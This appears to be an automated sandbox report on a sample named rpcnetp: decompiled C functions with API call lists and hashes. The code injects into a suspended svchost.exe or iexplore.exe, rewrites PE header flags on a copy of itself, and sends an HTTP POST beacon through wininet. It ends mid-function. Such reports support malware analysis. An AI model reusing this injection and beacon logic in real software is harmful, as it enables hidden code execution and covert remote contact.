				void* _t117;
				void* _t119;
				struct _STARTUPINFOA _t121;
				void** _t122;
				void* _t125;

				_t119 = __edx;
				_t117 = __ecx;
				_push(0x180);
				_push(0x72b25410);
				E72B24A94(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t125 - 0x1c)) = 0;
				 *((intOrPtr*)(_t125 - 0x3c)) = 0;
				 *((intOrPtr*)(_t125 - 0x24)) =  *((intOrPtr*)( *0x72b26008 + 0x34));
				 *(_t125 - 0x40) = 0;
				 *(_t125 - 4) = 0;
				_t70 = OpenProcess(0x1fffff, 1, GetCurrentProcessId());
				 *(_t125 - 0x38) = _t70;
				if(_t70 == 0) {
					L26:
					 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
					E72B22D0B(0);
					return E72B2159C( *((intOrPtr*)(_t125 - 0x1c)), _t119);
				} else {
					_t121 = 0x44;
					E72B24D2D(_t125 - 0x8c, 0, _t121);
					 *(_t125 - 0x8c) = _t121;
					 *((short*)(_t125 - 0x5c)) = 0;
					 *((intOrPtr*)(_t125 - 0x60)) = 0x181;
					 *(_t125 - 0x4c) =  *(_t125 - 0x38);
					if( *((intOrPtr*)(_t125 - 0x24)) == 0 || E72B22598(_t125 - 0x190, 0x104) == 0) {
						E72B22842(_t125 - 0x190, 1);
					}
					if( *(_t125 + 8) == 0) {
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessA(0, _t125 - 0x190, 0, 0, 1, 4, 0, 0, _t125 - 0x8c, _t125 - 0x34);
					} else {
						_t122 = _t125 + 8;
						 *(_t125 - 0x20) = 0;
						 *(_t125 - 0x44) = 0;
						if(DuplicateTokenEx( *(_t125 + 8), 0x2000000, 0, 0, 1, _t125 - 0x20) != 0) {
							SetTokenInformation( *(_t125 - 0x20), 0xc, _t125 - 0x44, 4);
							_t122 = _t125 - 0x20;
						}
						_push(0);
						_push( *_t122);
						_push(_t125 - 0x40);
						L72B2446E();
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessAsUserA( *_t122, 0, _t125 - 0x190, 0, 0, 1, 0x404,  *(_t125 - 0x40), 0, _t125 - 0x8c, _t125 - 0x34);
						if( *(_t125 - 0x20) != 0) {
							CloseHandle( *(_t125 - 0x20));
						}
					}
					if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
						L13:
						_t84 =  *((intOrPtr*)(_t125 - 0x1c));
						if(_t84 == 0) {
							goto L26;
						}
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							_t84 =  *0x72b260c4;
						}
						WriteProcessMemory( *(_t125 - 0x34), _t84 -  *0x72b260c4 + 0x72b260c8, 0x72b260c8, 0x80, 0);
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							ResumeThread( *(_t125 - 0x30));
							goto L23;
						} else {
							E72B224BC(0x72b260c8,  *(_t125 - 0x34),  *((intOrPtr*)( *0x72b26008 + 0x34)), 0, 0, _t125 - 0x1c, 0);
							if( *((intOrPtr*)(_t125 - 0x1c)) != 0) {
								L23:
								if( *0x72b26038 != 0) {
									E72B22758( *(_t125 - 0x34));
									 *(_t125 - 0x34) = 0;
								} else {
									 *((intOrPtr*)(_t125 - 0x3c)) = CreateThread(0, 0, E72B22758,  *(_t125 - 0x34), 0, _t125 - 0x48);
								}
								goto L26;
							}
							goto L18;
						}
					} else {
						if( *((intOrPtr*)(_t125 - 0x1c)) == 0) {
							L18:
							if( *(_t125 - 0x34) != 0) {
								TerminateProcess( *(_t125 - 0x34), 0);
								CloseHandle( *(_t125 - 0x34));
							}
							if( *(_t125 - 0x30) != 0) {
								CloseHandle( *(_t125 - 0x30));
							}
							goto L26;
						}
						E72B22842(_t125 - 0x190, 0);
						 *((intOrPtr*)(_t125 - 0x1c)) = E72B227D2(_t117, _t125 - 0x190,  *(_t125 - 0x34), 0);
						goto L13;
					}
				}
			}










0x72b22adb
0x72b22adb
0x72b22adb
0x72b22ae0
0x72b22ae5
0x72b22aec
0x72b22aef
0x72b22afa
0x72b22afd
0x72b22b00
0x72b22b13
0x72b22b19
0x72b22b1e
0x72b22cf5
0x72b22cf5
0x72b22cf9
0x72b22d06
0x72b22b24
0x72b22b26
0x72b22b30
0x72b22b35
0x72b22b3d
0x72b22b41
0x72b22b4b
0x72b22b51
0x72b22b70
0x72b22b70
0x72b22b78
0x72b22c16
0x72b22b7a
0x72b22b7a
0x72b22b7d
0x72b22b80
0x72b22b9a
0x72b22ba7
0x72b22bad
0x72b22bad
0x72b22bb0
0x72b22bb1
0x72b22bb6
0x72b22bb7
0x72b22be3
0x72b22be9
0x72b22bee
0x72b22bee
0x72b22be9
0x72b22c1c
0x72b22c43
0x72b22c43
0x72b22c48
0x00000000
0x00000000
0x72b22c51
0x72b22c53
0x72b22c53
0x72b22c70
0x72b22c79
0x72b22cc2
0x00000000
0x72b22c7b
0x72b22c8d
0x72b22c95
0x72b22cc8
0x72b22cce
0x72b22ced
0x72b22cf2
0x72b22cd0
0x72b22ce5
0x72b22ce5
0x00000000
0x72b22cce
0x00000000
0x72b22c95
0x72b22c1e
0x72b22c21
0x72b22c97
0x72b22c9a
0x72b22ca0
0x72b22ca9
0x72b22ca9
0x72b22cb2
0x72b22cb7
0x72b22cb7
0x00000000
0x72b22cb2
0x72b22c2b
0x72b22c40
0x00000000
0x72b22c40
0x72b22c1c

APIs
  • GetCurrentProcessId.KERNEL32(72B25410,00000180,72B23357), ref: 72B22B03
  • OpenProcess.KERNEL32(001FFFFF,00000001,00000000), ref: 72B22B13
  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000001), ref: 72B22B92
  • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004,?,?,?,?,?,?,?,?,?,?,?,?), ref: 72B22BA7
  • CreateEnvironmentBlock.USERENV(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 72B22BB7
  • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000404,?,00000000,?,?,?,?,00000000), ref: 72B22BDD
  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000044), ref: 72B22BEE
  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,00000001), ref: 72B22C10
  • WriteProcessMemory.KERNEL32(?,-72B260C4,72B260C8,00000080,00000000), ref: 72B22C70
  • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 72B22CA0
    • Part of subcall function 72B22598: GetSystemDirectoryA.KERNEL32(?,?), ref: 72B225AF
    • Part of subcall function 72B22598: lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD
  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000044), ref: 72B22CA9
  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 72B22CB7
  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000044), ref: 72B22CC2
  • CreateThread.KERNEL32(00000000,00000000,Function_00002758,?,00000000,?), ref: 72B22CDF
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Process$Create$CloseHandle$ThreadToken$BlockCurrentDirectoryDuplicateEnvironmentInformationMemoryOpenResumeSystemTerminateUserWritelstrcat
  • String ID:
  • API String ID: 1678882957-0
  • Opcode ID: 195c9657127d0ece1b739d2feb9ea30448834e8276fe395f646a0fbd9e09deb8
  • Instruction ID: f5b20b8953284a8165a29b877f7eeecf3b44c4b9faa719a56fe60fce383bd0f6
  • Opcode Fuzzy Hash: 195c9657127d0ece1b739d2feb9ea30448834e8276fe395f646a0fbd9e09deb8
  • Instruction Fuzzy Hash: C961F7B2812228AFDB218F95CD48EDEBBB9FF08742F10445AF60AE2111D7305A45CFA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22842(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t21;
				int _t24;
				int _t25;
				struct HINSTANCE__* _t28;
				signed short _t30;
				CHAR* _t37;
				void* _t40;
				long _t44;
				CHAR* _t46;
				void* _t48;

				_t21 = GetModuleFileNameA( *0x72b260c4,  &_v268, 0x104);
				if(_t21 == 0) {
					return _t21;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t46 = _a4;
				lstrcpyA(_t46,  &_v268);
				_t24 = lstrlenA(_t46);
				_t9 = _t46 - 3; // -3
				_t37 = _t24 + _t9;
				_t25 = lstrcmpiA(_t37, _v8);
				if(_t25 != 0) {
					lstrcpyA(_t37, _v8);
					_t25 = CopyFileA( &_v268, _t46, 0);
					if(_t25 != 0) {
						_t25 = CreateFileA(_t46, 0xc0000000, 3, 0, 3, 0, 0);
						_t48 = _t25;
						if(_t48 != 0xffffffff) {
							_t28 =  *0x72b260c4;
							_t40 =  *((intOrPtr*)(_t28 + 0x3c)) + _t28;
							_t44 = _t40 - _t28 + 0x16;
							_a4 = _t44;
							if(_a8 != 0) {
								_t30 =  *(_t40 + 0x16) & 0x0000dfff;
							} else {
								_t30 = 0x00002000 |  *(_t40 + 0x16);
							}
							_a8 = _t30;
							SetFilePointer(_t48, _t44, 0, 0);
							WriteFile(_t48,  &_a8, 2,  &_a4, 0);
							_t25 = CloseHandle(_t48);
						}
					}
				}
				return _t25;
			}















0x72b2285d
0x72b22865
0x72b22942
0x72b22942
0x72b2286f
0x72b22876
0x72b22878
0x72b22878
0x72b22888
0x72b22893
0x72b22896
0x72b2289f
0x72b2289f
0x72b228a4
0x72b228ac
0x72b228b6
0x72b228c3
0x72b228cb
0x72b228da
0x72b228e0
0x72b228e5
0x72b228e7
0x72b228ef
0x72b228f5
0x72b228f8
0x72b228fe
0x72b22914
0x72b22900
0x72b22905
0x72b22905
0x72b2291b
0x72b2291f
0x72b22931
0x72b22938
0x72b22938
0x72b228e5
0x72b228cb
0x00000000

APIs
  • GetModuleFileNameA.KERNEL32(?,00000104), ref: 72B2285D
  • lstrcpyA.KERNEL32(?,?,?,?,00000001), ref: 72B22893
  • lstrlenA.KERNEL32(?,?,?,00000001), ref: 72B22896
  • lstrcmpiA.KERNEL32(-00000003,72B212DC,?,?,00000001), ref: 72B228A4
  • lstrcpyA.KERNEL32(-00000003,72B212DC,?,?,00000001), ref: 72B228B6
  • CopyFileA.KERNEL32 ref: 72B228C3
  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000001), ref: 72B228DA
  • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,00000001), ref: 72B2291F
  • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000,?,?,00000001), ref: 72B22931
  • CloseHandle.KERNEL32(00000000,?,?,00000001), ref: 72B22938
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: File$lstrcpy$CloseCopyCreateHandleModuleNamePointerWritelstrcmpilstrlen
  • String ID: dll$exe
  • API String ID: 3010676052-2048111982
  • Opcode ID: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
  • Instruction ID: 39e45ebfadebca685611a7423d435aa536271cb13803ea72af992d0feb52d8ed
  • Opcode Fuzzy Hash: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
  • Instruction Fuzzy Hash: C331B636500218BBDB209F56CD48FEB3BFCEF85795F118469FA4AE7142E6308545CB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22598(CHAR* _a4, int _a8) {
				void* _v8;
				long _v12;
				int _v16;
				void* _t18;
				char* _t32;
				CHAR* _t34;

				_t32 = 0;
				if( *0x72b26038 != 0) {
					_t34 = _a4;
					while(1) {
						lstrcpyA(_t34, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe");
						if(_t32 != 0) {
							_t34[0x29] = 0;
						}
						if(RegOpenKeyA(0x80000002, _t34,  &_v8) != 0) {
							goto L10;
						}
						_v16 = _a8;
						RegQueryValueExA(_v8, _t32, 0,  &_v12, _t34,  &_v16);
						RegCloseKey(_v8);
						if(_t32 != 0) {
							lstrcatA(_t34, "\\Internet Explorer\\iexplore.exe");
						}
						if(GetBinaryTypeA(_t34,  &_v12) != 0 && _v12 == 0) {
							_t18 = 1;
							L14:
							return _t18;
						}
						L10:
						if(_t32 != 0) {
							_t18 = 0;
							goto L14;
						}
						_t32 = "ProgramFilesDir";
					}
				}
				GetSystemDirectoryA(_a4, _a8);
				lstrcatA(_a4, "\\svchost.exe");
				return 1;
			}









0x72b2259f
0x72b225a7
0x72b225cc
0x72b225cf
0x72b225d5
0x72b225dd
0x72b225df
0x72b225df
0x72b225f5
0x00000000
0x00000000
0x72b225fa
0x72b2260c
0x72b22615
0x72b2261d
0x72b22625
0x72b22625
0x72b22638
0x72b2264d
0x72b22652
0x00000000
0x72b22652
0x72b22640
0x72b22642
0x72b22650
0x00000000
0x72b22650
0x72b22644
0x72b22644
0x72b225cf
0x72b225af
0x72b225bd
0x00000000

APIs
  • GetSystemDirectoryA.KERNEL32(?,?), ref: 72B225AF
  • lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD
  • lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,00000000,00000044), ref: 72B225D5
  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 72B225ED
  • RegQueryValueExA.ADVAPI32(?,ProgramFilesDir,00000000,?,?,?), ref: 72B2260C
  • RegCloseKey.ADVAPI32(?), ref: 72B22615
  • lstrcatA.KERNEL32(?,\Internet Explorer\iexplore.exe), ref: 72B22625
  • GetBinaryTypeA.KERNEL32(?,?), ref: 72B22630
Strings
  • \svchost.exe, xrefs: 72B225B5
  • \Internet Explorer\iexplore.exe, xrefs: 72B2261F
  • Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 72B225CF
  • ProgramFilesDir, xrefs: 72B22608, 72B22644
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: lstrcat$BinaryCloseDirectoryOpenQuerySystemTypeValuelstrcpy
  • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe$\Internet Explorer\iexplore.exe$\svchost.exe
  • API String ID: 2611574897-1971102070
  • Opcode ID: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
  • Instruction ID: aa450610dbcd0adc5716e67513ca5fe787850a5d435588086c1ad627bace7870
  • Opcode Fuzzy Hash: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
  • Instruction Fuzzy Hash: 2C218E37560344BBDB129E69CC08BDB7BFDEF84286F214529F94AE6006E7308A51CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A12598(CHAR* _a4, int _a8) {
				void* _v8;
				long _v12;
				int _v16;
				void* _t18;
				char* _t32;
				CHAR* _t34;

				_t32 = 0;
				if( *0xa16038 != 0) {
					_t34 = _a4;
					while(1) {
						lstrcpyA(_t34, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe");
						if(_t32 != 0) {
							_t34[0x29] = 0;
						}
						if(RegOpenKeyA(0x80000002, _t34,  &_v8) != 0) {
							goto L10;
						}
						_v16 = _a8;
						RegQueryValueExA(_v8, _t32, 0,  &_v12, _t34,  &_v16);
						RegCloseKey(_v8);
						if(_t32 != 0) {
							lstrcatA(_t34, "\\Internet Explorer\\iexplore.exe");
						}
						if(GetBinaryTypeA(_t34,  &_v12) != 0 && _v12 == 0) {
							_t18 = 1;
							L14:
							return _t18;
						}
						L10:
						if(_t32 != 0) {
							_t18 = 0;
							goto L14;
						}
						_t32 = "ProgramFilesDir";
					}
				}
				GetSystemDirectoryA(_a4, _a8);
				lstrcatA(_a4, "\\svchost.exe");
				return 1;
			}









0x00a1259f
0x00a125a7
0x00a125cc
0x00a125cf
0x00a125d5
0x00a125dd
0x00a125df
0x00a125df
0x00a125f5
0x00000000
0x00000000
0x00a125fa
0x00a1260c
0x00a12615
0x00a1261d
0x00a12625
0x00a12625
0x00a12638
0x00a1264d
0x00a12652
0x00000000
0x00a12652
0x00a12640
0x00a12642
0x00a12650
0x00000000
0x00a12650
0x00a12644
0x00a12644
0x00a125cf
0x00a125af
0x00a125bd
0x00000000

APIs
  • GetSystemDirectoryA.KERNEL32(?,?), ref: 00A125AF
  • lstrcatA.KERNEL32(?,\svchost.exe), ref: 00A125BD
  • lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe), ref: 00A125D5
  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00A125ED
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00A1260C
  • RegCloseKey.ADVAPI32(?), ref: 00A12615
  • lstrcatA.KERNEL32(?,\Internet Explorer\iexplore.exe), ref: 00A12625
  • GetBinaryTypeA.KERNEL32(?,?), ref: 00A12630
Strings
  • \svchost.exe, xrefs: 00A125B5
  • \Internet Explorer\iexplore.exe, xrefs: 00A1261F
  • Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 00A125CF
  • ProgramFilesDir, xrefs: 00A12644
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: lstrcat$BinaryCloseDirectoryOpenQuerySystemTypeValuelstrcpy
  • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe$\Internet Explorer\iexplore.exe$\svchost.exe
  • API String ID: 2611574897-1971102070
  • Opcode ID: d9af8ec1adc1461aa0637ab33f50f143369798456ef589447eccc0f754a32c8a
  • Instruction ID: 49be7993c675de2a0bf383a7d8a0e0d9f36eee42b8b10c87fb1d541596da52c3
  • Opcode Fuzzy Hash: d9af8ec1adc1461aa0637ab33f50f143369798456ef589447eccc0f754a32c8a
  • Instruction Fuzzy Hash: 8D215C36A00144BBDB11DFA0DD48BEA7BBDEF48795F108025FA16D2060E730CAA6DB65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E72B22D7F(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v44;
				signed int _t31;
				_Unknown_base(*)()* _t33;
				signed int _t35;
				signed int _t36;
				intOrPtr* _t37;
				signed int _t44;
				void* _t52;
				signed int* _t55;

				_v8 = 0x4e20;
				_v12 = 0x493e0;
				_t31 = LoadLibraryA("wininet.dll");
				_t55 = _a4;
				_t55[0xd] = _t31;
				if(_t31 != 0) {
					_t5 =  &(_t55[3]); // 0x493ec
					_a4 = _t5;
					_t52 = 0;
					while(1) {
						_t7 = _t52 + 0x72b21574; // 0x72b21324
						_t33 = GetProcAddress(_t55[0xd],  *_t7);
						 *_a4 = _t33;
						if(_t33 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t52 = _t52 + 4;
						if(_t52 < 0x28) {
							continue;
						}
						_t36 = _t55[3]("Mozilla/4.0 (compatible; MSIE 7.0;)", 0, 0, 0, 0);
						 *_t55 = _t36;
						if(_t36 == 0) {
							L12:
							_t35 = _t36 | 0xffffffff;
							L14:
							return _t35;
						}
						if(_a16 != 0) {
							_t37 = _a12;
							_push( *_t37);
							L72B22946();
						} else {
							_t37 = _a8;
						}
						_t36 = _t55[4]( *_t55, _t37, 0x50, 0x72b211c4, 0x72b211c4, 3, 0, 0);
						_t55[1] = _t36;
						if(_t36 != 0) {
							_t36 = _t55[9](_t36, "POST", 0x72b211c4, 0, 0, 0, 0x84400100, 0);
							_t55[2] = _t36;
							if(_t36 != 0) {
								_t55[5](_t36, 2,  &_v8, 4);
								_t55[5](_t55[2], 5,  &_v12, 4);
								wsprintfA( &_v44, "%s: 0\r\n", "TagId");
								_t44 = _t55[7](_t55[2],  &_v44, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t35 = ( ~_t44 & 0x00000002) - 1;
								goto L14;
							}
						}
						goto L12;
					}
					FreeLibrary(_t55[0xd]);
					_t55[0xd] = 0;
					_t35 = 0;
					goto L14;
				}
				return _t31 | 0xffffffff;
			}














0x72b22d8c
0x72b22d93
0x72b22d9a
0x72b22da0
0x72b22da5
0x72b22daa
0x72b22db4
0x72b22db8
0x72b22dbb
0x72b22dbd
0x72b22dbd
0x72b22dc6
0x72b22dcf
0x72b22dd3
0x00000000
0x00000000
0x72b22dd5
0x72b22dd9
0x72b22ddf
0x00000000
0x00000000
0x72b22dea
0x72b22ded
0x72b22df1
0x72b22e4e
0x72b22e4e
0x72b22e9a
0x00000000
0x72b22e9a
0x72b22df6
0x72b22e10
0x72b22e13
0x72b22e15
0x72b22df8
0x72b22df8
0x72b22df8
0x72b22e2a
0x72b22e2d
0x72b22e32
0x72b22e44
0x72b22e47
0x72b22e4c
0x72b22e5c
0x72b22e6a
0x72b22e7b
0x72b22e8f
0x72b22e94
0x72b22e99
0x00000000
0x72b22e99
0x72b22e4c
0x00000000
0x72b22e32
0x72b22e00
0x72b22e06
0x72b22e09
0x00000000
0x72b22e09
0x00000000

APIs
  • LoadLibraryA.KERNEL32(wininet.dll), ref: 72B22D9A
  • GetProcAddress.KERNEL32(?,72B21324), ref: 72B22DC6
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: AddressLibraryLoadProc
  • String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 7.0;)$POST$TagId$wininet.dll
  • API String ID: 2574300362-1135021940
  • Opcode ID: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
  • Instruction ID: a2a5ce718f49d85c2f3b8665ac83783b69dbef2134b55f7e38b1c01db8571e2a
  • Opcode Fuzzy Hash: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
  • Instruction Fuzzy Hash: 9B31C2B1500308BFEB21AF64CD89E5B7BFDFF48396B104929F65AD6590D330A854CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E00A12D7F(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v44;
				signed int _t31;
				_Unknown_base(*)()* _t33;
				signed int _t35;
				signed int _t36;
				intOrPtr* _t37;
				signed int _t44;
				void* _t52;
				signed int* _t55;

				_v8 = 0x4e20;
				_v12 = 0x493e0;
				_t31 = LoadLibraryA("wininet.dll");
				_t55 = _a4;
				_t55[0xd] = _t31;
				if(_t31 != 0) {
					_t5 =  &(_t55[3]); // 0x493ec
					_a4 = _t5;
					_t52 = 0;
					while(1) {
						_t7 = _t52 + 0xa11574; // 0xa11324
						_t33 = GetProcAddress(_t55[0xd],  *_t7);
						 *_a4 = _t33;
						if(_t33 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t52 = _t52 + 4;
						if(_t52 < 0x28) {
							continue;
						}
						_t36 = _t55[3]("Mozilla/4.0 (compatible; MSIE 7.0;)", 0, 0, 0, 0);
						 *_t55 = _t36;
						if(_t36 == 0) {
							L12:
							_t35 = _t36 | 0xffffffff;
							L14:
							return _t35;
						}
						if(_a16 != 0) {
							_t37 = _a12;
							_push( *_t37);
							L00A12946();
						} else {
							_t37 = _a8;
						}
						_t36 = _t55[4]( *_t55, _t37, 0x50, 0xa111c4, 0xa111c4, 3, 0, 0);
						_t55[1] = _t36;
						if(_t36 != 0) {
							_t36 = _t55[9](_t36, "POST", 0xa111c4, 0, 0, 0, 0x84400100, 0);
							_t55[2] = _t36;
							if(_t36 != 0) {
								_t55[5](_t36, 2,  &_v8, 4);
								_t55[5](_t55[2], 5,  &_v12, 4);
								wsprintfA( &_v44, "%s: 0\r\n", "TagId");
								_t44 = _t55[7](_t55[2],  &_v44, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t35 = ( ~_t44 & 0x00000002) - 1;
								goto L14;
							}
						}
						goto L12;
					}
					FreeLibrary(_t55[0xd]);
					_t55[0xd] = 0;
					_t35 = 0;
					goto L14;
				}
				return _t31 | 0xffffffff;
			}














0x00a12d8c
0x00a12d93
0x00a12d9a
0x00a12da0
0x00a12da5
0x00a12daa
0x00a12db4
0x00a12db8
0x00a12dbb
0x00a12dbd
0x00a12dbd
0x00a12dc6
0x00a12dcf
0x00a12dd3
0x00000000
0x00000000
0x00a12dd5
0x00a12dd9
0x00a12ddf
0x00000000
0x00000000
0x00a12dea
0x00a12ded
0x00a12df1
0x00a12e4e
0x00a12e4e
0x00a12e9a
0x00000000
0x00a12e9a
0x00a12df6
0x00a12e10
0x00a12e13
0x00a12e15
0x00a12df8
0x00a12df8
0x00a12df8
0x00a12e2a
0x00a12e2d
0x00a12e32
0x00a12e44
0x00a12e47
0x00a12e4c
0x00a12e5c
0x00a12e6a
0x00a12e7b
0x00a12e8f
0x00a12e94
0x00a12e99
0x00000000
0x00a12e99
0x00a12e4c
0x00000000
0x00a12e32
0x00a12e00
0x00a12e06
0x00a12e09
0x00000000
0x00a12e09
0x00000000

APIs
  • LoadLibraryA.KERNEL32(wininet.dll), ref: 00A12D9A
  • GetProcAddress.KERNEL32(?,00A11324), ref: 00A12DC6
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: AddressLibraryLoadProc
  • String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 7.0;)$POST$TagId$wininet.dll
  • API String ID: 2574300362-1135021940
  • Opcode ID: 1f006786011ed46a069ffaf2a68cc34df7a598c70686d4edca63fcc9195deee3
  • Instruction ID: d299126795d9901d4a0bf5278818a5f86450b3b4989ad15f9af825405fd6ac61
  • Opcode Fuzzy Hash: 1f006786011ed46a069ffaf2a68cc34df7a598c70686d4edca63fcc9195deee3
  • Instruction Fuzzy Hash: 4D316FB1500608BFDB209FA0CD89EEBBFB9FF08755B104929F656D6590D370ED948B60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%
			E72B232DE() {
				void* _v8;
				void* _v12;
				long _v16;
				long _t11;
				signed int _t14;
				void* _t18;
				void* _t20;
				intOrPtr _t26;
				signed int _t30;
				int _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t38;

				_t11 = GetVersion();
				_t33 = 0;
				 *0x72b260b0 = _t11;
				if( *0x72b2608c == 0 && _t11 < 0) {
					 *0x72b26038 =  *0x72b26038 | 0xffffffff;
				}
				_v8 = GetStdHandle(0xfffffff4);
				_t38 = E72B23420(_t12);
				if(_t38 == _t33) {
					L11:
					_t14 =  *0x72b26038;
					__eflags = _t14 - _t33;
					if(_t14 != _t33) {
						__eflags = _t14 - 2;
						if(_t14 == 2) {
							goto L23;
						}
						__eflags = _t38 - _t33;
						if(_t38 != _t33) {
							L17:
							 *0x72b260ac = CreateEventA(_t33, _t33, _t33, _t33);
							L18:
							_t18 = CreateThread(_t33, _t33, E72B23161, _t33, _t33,  &_v16);
							_v12 = _t18;
							__eflags = _t18 - _t33;
							if(_t18 != _t33) {
								_t20 =  *0x72b260ac;
								__eflags = _t20 - _t33;
